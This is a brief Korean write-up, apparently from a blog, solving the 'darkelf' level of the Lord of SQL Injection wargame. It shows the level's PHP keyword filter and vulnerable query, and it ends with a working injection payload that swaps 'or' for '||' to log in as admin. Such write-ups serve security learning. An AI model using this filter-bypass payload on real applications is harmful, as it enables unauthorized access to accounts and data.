Web/Lord of Sql Ingection
LOS darkelf
언우s
2018. 4. 11. 09:31
6. darkelf
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
or, and 필터링
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'";
id=guest
if($result['id'] == 'admin') solve("darkelf");
id=admin 이어야 클리어
or, and 는 ||, &&로 우회 가능
?pw=%27%20||%20id=%27admin%27%23